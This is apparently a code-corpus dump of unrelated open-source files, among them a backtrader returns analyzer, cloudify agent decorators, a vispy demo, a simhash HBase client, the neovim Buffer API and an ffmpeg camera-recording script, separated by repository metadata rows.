continue
T = T + S[i]
except:
T = T + S[i]
return T
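    # Worked example: _squash_slashes('cdmi//objects///x') returns 'cdmi/objects/x'.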
| apache-2.0 | -8,973,868,036,584,532,000 | 27.375 | 85 | 0.54795 | false | 3.634236 | false | false | false |
cliburn/flow | src/plugins/statistics/summary.py | 1 | 1069 | """Provide summary statistics on data."""
from plugin import Statistics
from numpy import min, max, mean, median, std
class Summary(Statistics):
"""Plugin to display summary statistics"""
name = "Summary"
def Main(self, model):
"""Calculate summary statistics"""
self.model = model
fields = self.model.GetCurrentData().getAttr('fields')
data = self.model.GetCurrentData()[:]
low = list(min(data, axis=0))
high = list(max(data, axis=0))
mu = list(mean(data, axis=0))
        med = list(median(data, axis=0))  # column-wise, matching the other statistics
sig = list(std(data, axis=0))
self.model.NewGroup('Summary statistics')
self.model.hdf5.createArray(self.model.current_group, 'min', low)
self.model.hdf5.createArray(self.model.current_group, 'max', high)
self.model.hdf5.createArray(self.model.current_group, 'mean', mu)
self.model.hdf5.createArray(self.model.current_group, 'median', med)
self.model.hdf5.createArray(self.model.current_group, 'stdev', sig)
self.model.update()
| gpl-3.0 | -8,669,594,832,415,969,000 | 41.76 | 76 | 0.63985 | false | 3.636054 | false | false | false |
mementum/backtrader | backtrader/analyzers/logreturnsrolling.py | 1 | 5020 | #!/usr/bin/env python
# -*- coding: utf-8; py-indent-offset:4 -*-
###############################################################################
#
# Copyright (C) 2015-2020 Daniel Rodriguez
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
###############################################################################
from __future__ import (absolute_import, division, print_function,
unicode_literals)
import collections
import math
import backtrader as bt
__all__ = ['LogReturnsRolling']
class LogReturnsRolling(bt.TimeFrameAnalyzerBase):
'''This analyzer calculates rolling returns for a given timeframe and
compression
Params:
- ``timeframe`` (default: ``None``)
If ``None`` the ``timeframe`` of the 1st data in the system will be
used
Pass ``TimeFrame.NoTimeFrame`` to consider the entire dataset with no
time constraints
- ``compression`` (default: ``None``)
Only used for sub-day timeframes to for example work on an hourly
timeframe by specifying "TimeFrame.Minutes" and 60 as compression
If ``None`` then the compression of the 1st data of the system will be
used
- ``data`` (default: ``None``)
Reference asset to track instead of the portfolio value.
.. note:: this data must have been added to a ``cerebro`` instance with
``addata``, ``resampledata`` or ``replaydata``
- ``firstopen`` (default: ``True``)
When tracking the returns of a ``data`` the following is done when
crossing a timeframe boundary, for example ``Years``:
- Last ``close`` of previous year is used as the reference price to
see the return in the current year
      The problem is the 1st calculation, because the data has **no
      previous** closing price. As such and when this parameter is ``True``
the *opening* price will be used for the 1st calculation.
This requires the data feed to have an ``open`` price (for ``close``
the standard [0] notation will be used without reference to a field
price)
Else the initial close will be used.
- ``fund`` (default: ``None``)
If ``None`` the actual mode of the broker (fundmode - True/False) will
be autodetected to decide if the returns are based on the total net
asset value or on the fund value. See ``set_fundmode`` in the broker
documentation
Set it to ``True`` or ``False`` for a specific behavior
Methods:
- get_analysis
Returns a dictionary with returns as values and the datetime points for
each return as keys
'''
params = (
('data', None),
('firstopen', True),
('fund', None),
)
def start(self):
super(LogReturnsRolling, self).start()
if self.p.fund is None:
self._fundmode = self.strategy.broker.fundmode
else:
self._fundmode = self.p.fund
self._values = collections.deque([float('Nan')] * self.compression,
maxlen=self.compression)
if self.p.data is None:
# keep the initial portfolio value if not tracing a data
if not self._fundmode:
self._lastvalue = self.strategy.broker.getvalue()
else:
self._lastvalue = self.strategy.broker.fundvalue
def notify_fund(self, cash, value, fundvalue, shares):
if not self._fundmode:
self._value = value if self.p.data is None else self.p.data[0]
else:
self._value = fundvalue if self.p.data is None else self.p.data[0]
def _on_dt_over(self):
# next is called in a new timeframe period
if self.p.data is None or len(self.p.data) > 1:
# Not tracking a data feed or data feed has data already
vst = self._lastvalue # update value_start to last
else:
# The 1st tick has no previous reference, use the opening price
vst = self.p.data.open[0] if self.p.firstopen else self.p.data[0]
self._values.append(vst) # push values backwards (and out)
def next(self):
# Calculate the return
super(LogReturnsRolling, self).next()
self.rets[self.dtkey] = math.log(self._value / self._values[0])
self._lastvalue = self._value # keep last value
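# Illustrative usage sketch (cerebro/strategy setup assumed, not shown here):
#
#   cerebro.addanalyzer(LogReturnsRolling, _name='logret',
#                       timeframe=bt.TimeFrame.Months, compression=1)
#   results = cerebro.run()
#   print(results[0].analyzers.logret.get_analysis())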
| gpl-3.0 | -3,908,883,812,775,189,000 | 34.857143 | 79 | 0.60996 | false | 4.27234 | false | false | false |
codilime/cloudify-agent | cloudify_agent/installer/config/decorators.py | 1 | 5377 | #########
# Copyright (c) 2015 GigaSpaces Technologies Ltd. All rights reserved
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# * See the License for the specific language governing permissions and
# * limitations under the License.
from functools import wraps
from cloudify import ctx
from cloudify import context
from cloudify_agent.installer.config.attributes import AGENT_ATTRIBUTES
def attribute(name):
def decorator(function):
@wraps(function)
def wrapper(cloudify_agent):
# if the property was given in the invocation, use it.
# inputs are first in precedence order
if _update_agent_property(name,
props=cloudify_agent,
final_props=cloudify_agent):
return
if ctx.type == context.NODE_INSTANCE:
# if the property is inside a runtime property, use it.
# runtime properties are second in precedence order
runtime_properties = ctx.instance.runtime_properties.get(
'cloudify_agent', {})
if _update_agent_property(name,
props=runtime_properties,
final_props=cloudify_agent):
return
# if the property is declared on the node, use it
# node properties are third in precedence order
node_properties = ctx.node.properties.get(
'cloudify_agent', {})
node_properties.update(ctx.node.properties.get(
'agent_config', {}))
if _update_agent_property(name,
props=node_properties,
final_props=cloudify_agent):
return
# if the property is inside the bootstrap context,
# and its value is not None, use it
# bootstrap_context is forth in precedence order
attr = AGENT_ATTRIBUTES.get(name)
if attr is None:
raise RuntimeError('{0} is not an agent attribute'
.format(name))
agent_context = ctx.bootstrap_context.cloudify_agent.\
_cloudify_agent or {}
context_attribute = attr.get('context_attribute', name)
if _update_agent_property(context_attribute,
props=agent_context,
final_props=cloudify_agent,
final_key=name):
return
if _update_agent_property(name,
props=agent_context,
final_props=cloudify_agent):
return
# apply the function itself
ctx.logger.debug('Applying function:{0} on Attribute '
'<{1}>'.format(function.__name__, name))
value = function(cloudify_agent)
if value is not None:
ctx.logger.debug('{0} set by function:{1}'
.format(name, value))
cloudify_agent[name] = value
return
# set default value
default = attr.get('default')
if default is not None:
ctx.logger.debug('{0} set by default value'
.format(name, value))
cloudify_agent[name] = default
return
return wrapper
return decorator
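# Illustrative sketch of how @attribute is typically applied (the attribute
# name and body below are hypothetical, not taken from this file):
#
#   @attribute('user')
#   def user(cloudify_agent):
#       return getpass.getuser()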
def group(name):
def decorator(group_function):
@wraps(group_function)
def wrapper(cloudify_agent, *args, **kwargs):
# collect all attributes belonging to that group
group_attributes = {}
for attr_name, attr_value in AGENT_ATTRIBUTES.iteritems():
if attr_value.get('group') == name:
group_attributes[attr_name] = attr_value
for group_attr_name in group_attributes.iterkeys():
# iterate and try to set all the attributes of the group as
# defined in the heuristics of @attribute.
@attribute(group_attr_name)
def setter(_):
pass
setter(cloudify_agent)
# when we are done, invoke the group function to
# apply group logic
group_function(cloudify_agent, *args, **kwargs)
return wrapper
return decorator
def _update_agent_property(name, props, final_props, final_key=None):
final_key = final_key or name
extra_props = props.get('extra', {})
if name in extra_props:
final_props[final_key] = extra_props[name]
return True
if name in props:
final_props[final_key] = props[name]
return True
return False
| apache-2.0 | -2,597,727,802,150,284,000 | 36.340278 | 77 | 0.53766 | false | 4.874887 | false | false | false |
liubenyuan/vispy-tutorial | examples/04-tetrahedron.py | 1 | 4445 | # pylint: disable=invalid-name, no-member, unused-argument
""" passing varyings to fragment """
import numpy as np
from vispy import app, gloo
from vispy.util.transforms import translate, perspective, rotate
# note the 'color' and 'v_color' in vertex
vertex = """
uniform mat4 u_model; // Model matrix
uniform mat4 u_view; // View matrix
uniform mat4 u_projection; // Projection matrix
uniform vec4 u_color; // mask color for edge plotting
attribute vec3 a_position;
attribute vec4 a_color;
varying vec4 v_color;
void main()
{
gl_Position = u_projection * u_view * u_model * vec4(a_position, 1.0);
v_color = a_color * u_color;
}
"""
# note the varying 'v_color', it must has the same name as in the vertex.
fragment = """
varying vec4 v_color;
void main()
{
gl_FragColor = v_color;
}
"""
class Canvas(app.Canvas):
""" build canvas class for this demo """
def __init__(self):
""" initialize the canvas """
app.Canvas.__init__(self,
size=(512, 512),
title='scaling quad',
keys='interactive')
# shader program
tet = gloo.Program(vert=vertex, frag=fragment)
# vertices
V = np.array([(0, 0, 0),
(1, 0, 0),
(1.0/2.0, np.sqrt(3.0)/2.0, 0),
(1.0/2.0, np.sqrt(3.0)/6.0, np.sqrt(2.0/3.0))],
dtype=np.float32)
# triangles specified by connecting matrix,
# it can also be initialized using itertools
I = np.array([(0, 1, 2),
(0, 3, 1),
(0, 2, 3),
(1, 3, 2)], dtype=np.uint32)
# edges, used for drawing outline
E = np.array([(0, 1), (1, 2), (2, 0), (1, 3), (2, 3), (0, 3)],
dtype=np.uint32)
# colors of vertices
C = np.array([(1, 0, 0, 1),
(0, 1, 0, 1),
(0, 0, 1, 1),
(1, 1, 0, 1)], dtype=np.float32)
# bind to data
tet['a_position'] = V
tet['a_color'] = C
self.I = gloo.IndexBuffer(I)
self.E = gloo.IndexBuffer(E)
# intialize transformation matrix
view = np.eye(4, dtype=np.float32)
model = np.eye(4, dtype=np.float32)
projection = np.eye(4, dtype=np.float32)
# set view
view = translate((0, 0, -5))
tet['u_model'] = model
tet['u_view'] = view
tet['u_projection'] = projection
# bind your program
self.program = tet
# config and set viewport
gloo.set_viewport(0, 0, *self.physical_size)
gloo.set_clear_color('white')
gloo.set_state('translucent')
gloo.set_polygon_offset(1.0, 1.0)
# bind a timer
self.timer = app.Timer('auto', self.on_timer)
self.theta = 0.0
self.phi = 0.0
self.timer.start()
# show the canvas
self.show()
def on_resize(self, event):
""" canvas resize callback """
ratio = event.physical_size[0] / float(event.physical_size[1])
self.program['u_projection'] = perspective(45.0, ratio, 2.0, 10.0)
gloo.set_viewport(0, 0, *event.physical_size)
def on_draw(self, event):
""" canvas update callback """
gloo.clear()
        # Filled tetrahedron
gloo.set_state(blend=True, depth_test=False,
polygon_offset_fill=True)
self.program['u_color'] = [1.0, 1.0, 1.0, 0.8]
self.program.draw('triangles', self.I)
# draw outline
gloo.set_state(blend=False, depth_test=False,
polygon_offset_fill=True)
self.program['u_color'] = [0.0, 0.0, 0.0, 1.0]
self.program.draw('lines', self.E)
def on_timer(self, event):
""" canvas time-out callback """
self.theta += .5
self.phi += .5
# note the convention is, theta is applied first and then phi
# see vispy.utils.transforms,
# python is row-major and opengl is column major,
# so the rotate function transposes the output.
model = np.dot(rotate(self.theta, (0, 1, 0)),
rotate(self.phi, (0, 0, 1)))
self.program['u_model'] = model
self.update()
# Finally, we show the canvas and we run the application.
c = Canvas()
app.run()
| apache-2.0 | 7,396,573,617,910,617,000 | 30.524823 | 74 | 0.525309 | false | 3.39313 | false | false | false |
seomoz/simhash-db-py | simhash_db/hbase_client.py | 1 | 3893 | #! /usr/bin/env python
'''Our code to connect to the HBase backend. It uses the happybase
package, which depends on the Thrift service that (for now) is
part of HBase.'''
from gevent import monkey
monkey.patch_all()
import struct
import happybase
import Hbase_thrift
from . import BaseClient
def column_name(integer):
'''Convert an integer to a column name.'''
return 'f%02d:c' % integer
class Client(BaseClient):
'''Our HBase backend client'''
def __init__(self, name, num_blocks, num_bits, *args, **kwargs):
BaseClient.__init__(self, name, num_blocks, num_bits)
# Time to live in seconds
ttl = kwargs.pop('ttl', None)
if ttl is None:
raise ValueError
self.connection = happybase.Connection(**kwargs)
families = {column_name(i): dict(time_to_live=ttl)
for i in range(self.num_tables)}
try:
self.connection.create_table(name, families)
except Hbase_thrift.AlreadyExists:
pass
self.table = self.connection.table(name)
def delete(self):
'''Delete this database of simhashes'''
if self.table is not None:
self.connection.delete_table(self.name, disable=True)
self.table = None
def insert(self, hash_or_hashes):
'''Insert one (or many) hashes into the database'''
if self.table is None:
return
hashes = hash_or_hashes
if not hasattr(hash_or_hashes, '__iter__'):
hashes = [hash_or_hashes]
for hsh in hashes:
for i in range(self.num_tables):
row_key = struct.pack('!Q',
long(self.corpus.tables[i].permute(hsh)))
self.table.put(row_key, {column_name(i): None})
def find_in_table(self, hsh, table_num, ranges):
'''Return all the results found in this particular table'''
low = struct.pack('!Q', ranges[table_num][0])
high = struct.pack('!Q', ranges[table_num][1])
pairs = self.table.scan(row_start=low, row_stop=high,
columns=[column_name(table_num)])
results = [struct.unpack('!Q', k)[0] for k, v in pairs]
results = [self.corpus.tables[table_num].unpermute(d)
for d in results]
return [h for h in results if
self.corpus.distance(h, hsh) <= self.num_bits]
def find_one(self, hash_or_hashes):
'''Find one near-duplicate for the provided query (or queries)'''
if self.table is None:
return None
hashes = hash_or_hashes
if not hasattr(hash_or_hashes, '__iter__'):
hashes = [hash_or_hashes]
results = []
for hsh in hashes:
ranges = self.ranges(hsh)
found = []
for i in range(self.num_tables):
found = self.find_in_table(hsh, i, ranges)
if found:
results.append(found[0])
break
if not found:
results.append(None)
if not hasattr(hash_or_hashes, '__iter__'):
return results[0]
return results
def find_all(self, hash_or_hashes):
'''Find all near-duplicates for the provided query (or queries)'''
if self.table is None:
return None
hashes = hash_or_hashes
if not hasattr(hash_or_hashes, '__iter__'):
hashes = [hash_or_hashes]
results = []
for hsh in hashes:
ranges = self.ranges(hsh)
found = []
for i in range(self.num_tables):
found.extend(self.find_in_table(hsh, i, ranges))
found = list(set(found))
results.append(found)
if not hasattr(hash_or_hashes, '__iter__'):
return results[0]
return results
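# Illustrative usage sketch (table name, block/bit counts and connection
# parameters are assumptions):
#
#   client = Client('simhashes', num_blocks=6, num_bits=3,
#                   ttl=7 * 24 * 3600, host='localhost')
#   client.insert(0x1234567890abcdef)
#   matches = client.find_all(0x1234567890abcdcf)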
| mit | 7,742,667,128,239,649,000 | 31.714286 | 79 | 0.553301 | false | 3.936299 | false | false | false |
awes0menessInc/python-projects | Alien-Invasion/button.py | 1 | 1269 | import pygame.font
class Button():
""" A class to create a button. """
def __init__(self, screen, msg):
"""Initialize button attributes."""
self.screen = screen
self.screen_rect = screen.get_rect()
# Set the dimensions and properties of the button.
self.width, self.height = 200, 50
self.button_color = (0, 255, 0)
self.text_color = (255, 255, 255)
self.font = pygame.font.SysFont(None, 48)
# Build the button's rect object and center it.
self.rect = pygame.Rect(0, 0, self.width, self.height)
self.rect.center = self.screen_rect.center
# The button message needs to be prepped only once.
self.prep_msg(msg)
def prep_msg(self, msg):
"""Turn msg into a rendered image and center text on the button."""
self.msg_image = self.font.render(msg, True, self.text_color,
self.button_color)
self.msg_image_rect = self.msg_image.get_rect()
self.msg_image_rect.center = self.rect.center
def draw_button(self):
# Draw blank button and then draw message.
self.screen.fill(self.button_color, self.rect)
self.screen.blit(self.msg_image, self.msg_image_rect)
| mit | 4,828,632,466,260,825,000 | 35.257143 | 75 | 0.602049 | false | 3.754438 | false | false | false |
msfrank/mandelbrot | mandelbrot/registry.py | 1 | 3001 | # Copyright 2015 Michael Frank <[email protected]>
#
# This file is part of Mandelbrot.
#
# Mandelbrot is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Mandelbrot is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Mandelbrot. If not, see <http://www.gnu.org/licenses/>.
import pkg_resources
import logging
log = logging.getLogger("mandelbrot.registry")
from mandelbrot import versionstring
require_mandelbrot = 'mandelbrot == ' + versionstring()
class Registry(object):
"""
"""
def __init__(self):
self.env = pkg_resources.Environment([])
plugins,errors = pkg_resources.working_set.find_plugins(self.env)
for plugin in plugins:
pkg_resources.working_set.add(plugin)
for error in errors:
log.info("failed to load distribution: %s", error)
self.overrides = {}
def override_factory(self, entry_point_type, factory_name, factory):
"""
:param entry_point_type:
:type entry_point_type: str
:param factory_name:
:type factory_name: str
:param factory:
:type factory: type
"""
self.overrides[(entry_point_type,factory_name)] = factory
def lookup_factory(self, entry_point_type, factory_name, factory_type, requirement=require_mandelbrot):
"""
:param entry_point_type:
:type entry_point_type: str
:param factory_name:
:type factory_name: str
:param factory_type:
:type factory_type: type
:param requirement:
:type requirement: str
"""
log.debug("looking up '%s' of type %s with requirement %s", factory_name,
entry_point_type, requirement)
# check factory overrides first
if (entry_point_type,factory_name) in self.overrides:
factory = self.overrides[(entry_point_type,factory_name)]
# find the entrypoint matching the specified requirement
else:
requirement = pkg_resources.Requirement.parse(requirement)
distribution = pkg_resources.working_set.find(requirement)
factory = distribution.load_entry_point(entry_point_type, factory_name)
log.debug("loaded factory %s.%s", factory.__module__, factory.__class__.__name__)
# verify that the factory is the correct type
if not issubclass(factory, factory_type):
raise TypeError("{}.{} is not a subclass of {}".format(
factory.__module__, factory.__class__.__name__, factory_type.__name__))
return factory
| gpl-3.0 | -5,360,309,663,945,176,000 | 39.013333 | 107 | 0.654782 | false | 4.088556 | false | false | false |
lunixbochs/actualvim | lib/neovim/api/buffer.py | 1 | 6063 | """API for working with a Nvim Buffer."""
from .common import Remote
from ..compat import IS_PYTHON3
__all__ = ('Buffer')
if IS_PYTHON3:
basestring = str
def adjust_index(idx, default=None):
"""Convert from python indexing convention to nvim indexing convention."""
if idx is None:
return default
elif idx < 0:
return idx - 1
else:
return idx
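# Worked example: adjust_index(2) -> 2 and adjust_index(-1) -> -2; negative
# indices are shifted by one so that Python-style slicing maps onto the
# Nvim API's exclusive-end convention (see Buffer.__getitem__ below).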
class Buffer(Remote):
"""A remote Nvim buffer."""
_api_prefix = "nvim_buf_"
def __len__(self):
"""Return the number of lines contained in a Buffer."""
return self.request('buffer_line_count')
def _get_lines(self, start, end, strict):
lines = self.request_raw('nvim_buf_get_lines', start, end, strict)
return [line.decode('utf8') for line in lines]
def _set_lines(self, start, end, strict, lines):
lines = [line.encode('utf8') for line in lines]
return self.request_raw('nvim_buf_set_lines', start, end, strict, lines)
def __getitem__(self, idx):
"""Get a buffer line or slice by integer index.
Indexes may be negative to specify positions from the end of the
buffer. For example, -1 is the last line, -2 is the line before that
and so on.
        When retrieving slices, omitting indexes (e.g. `buffer[:]`) will bring
the whole buffer.
"""
if not isinstance(idx, slice):
i = adjust_index(idx)
return self._get_lines(i, i + 1, True)[0]
start = adjust_index(idx.start, 0)
end = adjust_index(idx.stop, -1)
return self._get_lines(start, end, False)
def __setitem__(self, idx, item):
"""Replace a buffer line or slice by integer index.
Like with `__getitem__`, indexes may be negative.
        When replacing slices, omitting indexes (e.g. `buffer[:]`) will replace
the whole buffer.
"""
if not isinstance(idx, slice):
i = adjust_index(idx)
lines = [item] if item is not None else []
return self._set_lines(i, i + 1, True, lines)
lines = item if item is not None else []
start = adjust_index(idx.start, 0)
end = adjust_index(idx.stop, -1)
return self._set_lines(start, end, False, lines)
def __iter__(self):
"""Iterate lines of a buffer.
        This will retrieve all lines locally before iteration starts. In most
        cases this is the better approach, because it minimizes the number of
        API calls by transferring all needed data at once.
"""
lines = self[:]
for line in lines:
yield line
def __delitem__(self, idx):
"""Delete line or slice of lines from the buffer.
This is the same as __setitem__(idx, [])
"""
self.__setitem__(idx, None)
def append(self, lines, index=-1):
"""Append a string or list of lines to the buffer."""
if isinstance(lines, (basestring, bytes)):
lines = [lines]
return self._set_lines(index, index, True, lines)
def mark(self, name):
"""Return (row, col) tuple for a named mark."""
return self.request('nvim_buf_get_mark', name)
def range(self, start, end):
"""Return a `Range` object, which represents part of the Buffer."""
return Range(self, start, end)
def add_highlight(self, hl_group, line, col_start=0,
col_end=-1, src_id=-1, async=None):
"""Add a highlight to the buffer."""
if async is None:
async = (src_id != 0)
return self.request('nvim_buf_add_highlight', src_id, hl_group,
line, col_start, col_end, async=async)
def clear_highlight(self, src_id, line_start=0, line_end=-1, async=True):
"""Clear highlights from the buffer."""
self.request('nvim_buf_clear_highlight', src_id,
line_start, line_end, async=async)
@property
def name(self):
"""Get the buffer name."""
return self.request('nvim_buf_get_name')
@name.setter
def name(self, value):
"""Set the buffer name. BufFilePre/BufFilePost are triggered."""
return self.request('nvim_buf_set_name', value)
@property
def valid(self):
"""Return True if the buffer still exists."""
return self.request('nvim_buf_is_valid')
@property
def number(self):
"""Get the buffer number."""
return self.handle
class Range(object):
def __init__(self, buffer, start, end):
self._buffer = buffer
self.start = start - 1
self.end = end - 1
def __len__(self):
return self.end - self.start + 1
def __getitem__(self, idx):
if not isinstance(idx, slice):
return self._buffer[self._normalize_index(idx)]
start = self._normalize_index(idx.start)
end = self._normalize_index(idx.stop)
if start is None:
start = self.start
if end is None:
end = self.end + 1
return self._buffer[start:end]
def __setitem__(self, idx, lines):
if not isinstance(idx, slice):
self._buffer[self._normalize_index(idx)] = lines
return
start = self._normalize_index(idx.start)
end = self._normalize_index(idx.stop)
if start is None:
start = self.start
if end is None:
end = self.end + 1
self._buffer[start:end] = lines
def __iter__(self):
for i in range(self.start, self.end + 1):
yield self._buffer[i]
def append(self, lines, i=None):
i = self._normalize_index(i)
if i is None:
i = self.end + 1
self._buffer.append(lines, i)
def _normalize_index(self, index):
if index is None:
return None
if index < 0:
index = self.end
else:
index += self.start
if index > self.end:
index = self.end
return index
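# --- Usage sketch (added for illustration; not part of the original module) ---
# These wrappers only do something useful against a live Nvim session, e.g.
# one obtained through the python client's attach()/session helpers:
#
#     buf = nvim.current.buffer      # a Buffer instance
#     print(len(buf))                # number of lines
#     buf[0] = 'first line'          # replace a single line
#     buf.append(['a', 'b'])         # append lines at the end of the buffer
#     first_ten = buf[0:10]          # slicing returns a plain list of strings
#     middle = buf.range(1, 5)       # a Range view over lines 1-5
#
# The exact session setup depends on the surrounding client code and is not
# shown here.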
| mit | 3,638,414,735,793,391,600 | 30.414508 | 80 | 0.568036 | false | 3.937013 | false | false | false |
mikehankey/fireball_camera | ffmpeg_record.py | 1 | 2859 | #!/usr/bin/python3
import glob
import sys
import subprocess
import os
import time
video_dir = "/mnt/ams2"
def check_running(cam_num, type):
if type == "HD":
cmd = "ps -aux |grep \"ffmpeg\" | grep \"HD\" | grep \"cam" + cam_num + "\" | grep -v grep | wc -l"
else:
cmd = "ps -aux |grep \"ffmpeg\" | grep \"SD\" | grep \"cam" + cam_num + "\" | grep -v grep | wc -l"
print(cmd)
output = subprocess.check_output(cmd, shell=True).decode("utf-8")
output = int(output.replace("\n", ""))
return(int(output))
def start_capture(cam_num):
running = check_running(cam_num, "HD")
if running == 0:
cmd = "/usr/bin/ffmpeg -i rtsp://192.168.76.7" + cam_num + "/av0_0 -c copy -map 0 -f segment -strftime 1 -segment_time 60 -segment_format mp4 \"" + video_dir + "/HD/" + "%Y-%m-%d_%H-%M-%S-cam" + cam_num + ".mp4\" 2>&1 > /dev/null & "
print(cmd)
os.system(cmd)
time.sleep(2)
else:
print ("ffmpeg already running for cam:", cam_num)
running = check_running(cam_num, "SD")
if running == 0:
cmd = "/usr/bin/ffmpeg -i rtsp://192.168.76.7" + cam_num + "/av0_1 -c copy -map 0 -f segment -strftime 1 -segment_time 60 -segment_format mp4 \"" + video_dir + "/SD/" + "%Y-%m-%d_%H-%M-%S-cam" + cam_num + ".mp4\" 2>&1 > /dev/null & "
print(cmd)
os.system(cmd)
time.sleep(2)
else:
print ("ffmpeg already running for cam:", cam_num)
def stop_capture(cam_num):
   # Note: this kills every running ffmpeg process, not just the one for cam_num.
   #print ("Stopping capture for ", cam_num)
cmd = "kill -9 `ps -aux | grep ffmpeg |grep -v grep| awk '{print $2}'`"
output = subprocess.check_output(cmd, shell=True).decode("utf-8")
print (output)
def purge(cam_num):
   # remove recordings older than roughly 0.8 days from the camera's directory
cur_time = int(time.time())
#cmd = "rm " + cam_num + "/*"
#print (cmd)
#os.system(cmd)
for filename in (glob.glob(video_dir + '/' + cam_num + '/*.mp4')):
st = os.stat(filename)
mtime = st.st_mtime
tdiff = cur_time - mtime
tdiff = tdiff / 60 / 60 / 24
if tdiff >= .8:
cmd = "rm " + filename
print(cmd)
os.system(cmd)
#file_list.append(filename)
cmd = None
cam_num = None
try:
   cmd = sys.argv[1]
   cam_num = sys.argv[2]
except IndexError:
   do_all = 1
if (cmd == "stop"):
stop_capture("1")
if (cmd == "start"):
start_capture(cam_num)
if (cmd == "start_all"):
start_capture("1")
start_capture("2")
start_capture("3")
start_capture("4")
start_capture("5")
start_capture("6")
if (cmd == "purge"):
purge(cam_num)
if (cmd == "check_running"):
running = check_running(cam_num, "HD")
print (running)
running = check_running(cam_num, "SD")
print (running)
if (cmd == "purge_all"):
purge("1")
purge("2")
purge("3")
purge("4")
purge("5")
purge("6")
#ffmpeg -i rtsp://192.168.76.71/av0_1 -c copy -map 0 -f segment -segment_time 60 -segment_format mp4 "1/capture-1-%03d.mp4" &
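# --- Example invocations (added for illustration) ---
# Assuming the script is saved as ffmpeg_record.py and the camera IP scheme
# above (192.168.76.7<cam_num>) matches the local network:
#
#     python3 ffmpeg_record.py start 1          # start HD and SD capture for camera 1
#     python3 ffmpeg_record.py start_all        # start capture for cameras 1-6
#     python3 ffmpeg_record.py check_running 1  # print HD/SD process counts for camera 1
#     python3 ffmpeg_record.py purge 1          # delete old files under /mnt/ams2/1/
#     python3 ffmpeg_record.py stop             # kills every running ffmpeg process
#
# A cron entry could call "start_all" periodically to restart dropped captures.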
| gpl-3.0 | 4,738,862,852,939,186,000 | 25.971698 | 239 | 0.564533 | false | 2.841948 | false | false | false |
release-engineering/fedmsg_meta_umb | fedmsg_meta_umb/rpmdiff.py | 1 | 2379 | # Copyright (C) 2017 Red Hat, Inc.
#
# fedmsg_meta_umb is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 2.1 of the License, or (at your option) any later version.
#
# fedmsg_meta_umb is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with fedmsg; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
#
# Authors: Ralph Bean <[email protected]>
from fedmsg.meta.base import BaseProcessor
class RPMDiffProcessor(BaseProcessor):
topic_prefix_re = r'/topic/VirtualTopic\.eng'
__name__ = 'rpmdiff'
__description__ = 'the rpmdiff analysis system'
__link__ = 'https://rpmdiff.engineering.redhat.com/'
__docs__ = 'https://docs.engineering.redhat.com/display/EXD/rpmdiff'
__obj__ = 'RPMDiff Analysis System'
__icon__ = '_static/img/icons/erratatool50.png'
def title(self, msg, **config):
return msg['topic'].split('.', 2)[-1]
def subtitle(self, msg, **config):
action = self.title(msg, **config).split('.')[-1]
if msg['msg']['type'] == 'COMPARISON':
kwargs = dict(
action=action,
package=msg['msg']['package_name'],
baseline='-'.join(msg['msg']['baseline'].rsplit('-', 2)[1:]),
target='-'.join(msg['msg']['nvr'].rsplit('-', 2)[1:]),
)
template = ('rpmdiff comparison of {package} is {action} '
'({target} against {baseline})')
return template.format(**kwargs)
elif msg['msg']['type'] == 'ANALYSIS':
kwargs = dict(action=action, nvr=msg['msg']['nvr'])
template = 'rpmdiff analysis of {nvr} is {action}'
return template.format(**kwargs)
def packages(self, msg, **config):
return set([msg['msg']['package_name']])
def link(self, msg, **config):
template = 'https://rpmdiff.engineering.redhat.com/run/{run_id}/'
return template.format(**msg['msg'])
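# --- Illustrative message handling (added for clarity; field values are made up) ---
# Given a bus message whose body looks roughly like
#
#     msg = {'topic': '/topic/VirtualTopic.eng.rpmdiff.job.completed',
#            'msg': {'type': 'COMPARISON',
#                    'package_name': 'openssl',
#                    'baseline': 'openssl-1.0.1e-60.el7',
#                    'nvr': 'openssl-1.0.2k-8.el7',
#                    'run_id': 12345}}
#
# subtitle() would render something like
#     "rpmdiff comparison of openssl is completed (1.0.2k-8.el7 against 1.0.1e-60.el7)"
# and link() would point at https://rpmdiff.engineering.redhat.com/run/12345/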
| lgpl-2.1 | 5,623,728,822,967,871,000 | 40.736842 | 78 | 0.623792 | false | 3.800319 | false | false | false |
jesuscript/topo-mpi | param/external.py | 1 | 68357 | """
External code required for param/tkinter interface.
* odict: an ordered dictionary
* tilewrapper: a wrapper for Tile/ttk widgets
Note that an ordered dictionary and a wrapper for ttk widgets are both
available in Python 2.7.
"""
from __future__ import generators
# odict.py
# An Ordered Dictionary object
# Copyright (C) 2005 Nicola Larosa, Michael Foord
# E-mail: nico AT tekNico DOT net, fuzzyman AT voidspace DOT org DOT uk
# This software is licensed under the terms of the BSD license.
# http://www.voidspace.org.uk/python/license.shtml
# Basically you're free to copy, modify, distribute and relicense it,
# So long as you keep a copy of the license with it.
# Documentation at http://www.voidspace.org.uk/python/odict.html
# For information about bugfixes, updates and support, please join the
# Pythonutils mailing list:
# http://groups.google.com/group/pythonutils/
# Comments, suggestions and bug reports welcome.
"""A dict that keeps keys in insertion order"""
